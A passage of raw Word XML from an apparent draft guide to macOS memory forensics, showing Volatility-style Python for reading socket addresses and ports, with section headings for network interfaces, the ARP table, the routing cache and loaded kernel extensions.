          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> state</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Pr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> get_connection_info</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>self</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ipcb </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</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so_pcb</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dereference_as</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"inpcb"</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if</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 xml:space="preserve">family </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</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ret </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ipcb</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipv4_info</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else</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ret </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ipcb</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipv6_info</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007279AA" w:rsidRDefault="007279AA" w:rsidP="00604427">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007279AA" w:rsidRPr="007279AA" w:rsidRDefault="007279AA" w:rsidP="007279AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ipv4_info</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>self</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lip </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</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inp_dependladdr</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inp46_local</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ia46_addr4</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s_addr</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    lport </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</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 xml:space="preserve">inp_lport </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007279AA" w:rsidRPr="007279AA" w:rsidRDefault="007279AA" w:rsidP="007279AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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rip </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</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inp_dependfaddr</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inp46_foreign</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ia46_addr4</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s_addr</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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rport </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> self</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">inp_fport </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007279AA" w:rsidRPr="007279AA" w:rsidRDefault="007279AA" w:rsidP="007279AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007279AA" w:rsidRPr="007279AA" w:rsidRDefault="007279AA" w:rsidP="007279AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lip</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lport</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rip</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rport</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00167026" w:rsidRDefault="00167026" w:rsidP="00167026">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc445313272"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1197D" w:rsidRPr="00D1197D" w:rsidRDefault="00D1197D" w:rsidP="00D1197D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dlil_ifnet_head list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00167026" w:rsidRDefault="00D1197D" w:rsidP="00167026">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc445313273"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ifnet structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w:rsidR="00D1197D" w:rsidRDefault="00D1197D" w:rsidP="00D1197D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc445313274"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>arp table</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1197D" w:rsidRPr="00D1197D" w:rsidRDefault="00D1197D" w:rsidP="00D1197D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> llinfo_arp list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D1197D" w:rsidRDefault="00D1197D" w:rsidP="00D1197D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc445313275"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxxx structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc445313276"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>routing cache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRPr="00D1197D" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> xxxxx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc445313277"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>route cache entry structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc445313278"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Loaded kernel module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> _kmod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E70373" w:rsidRPr="00D1197D" w:rsidRDefault="00E70373" w:rsidP="0033335A">
      <w:r w:rsidRPr="00E70373">
        <w:t>sLoadedKexts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc445313279"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kmod_info</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRPr="007279AA" w:rsidRDefault="0033335A" w:rsidP="0033335A"/>
    <w:p w:rsidR="0033335A" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:r>
        <w:t xml:space="preserve">                    Address(kmod.obj_offset),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:r>
        <w:t xml:space="preserve">                    Address(kmod.address),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:r>
        <w:t xml:space="preserve">                    int(kmod.m('size')),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:r>
        <w:t xml:space="preserve">                    int(kmod.reference_count),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:r>
        <w:t xml:space="preserve">                    str(kmod.version),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007279AA" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:r>
        <w:t xml:space="preserve">                    str(kmod.name),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00321BA4" w:rsidRDefault="00321BA4" w:rsidP="00321BA4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* The kmod_info_t structure is only safe to use inside the running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
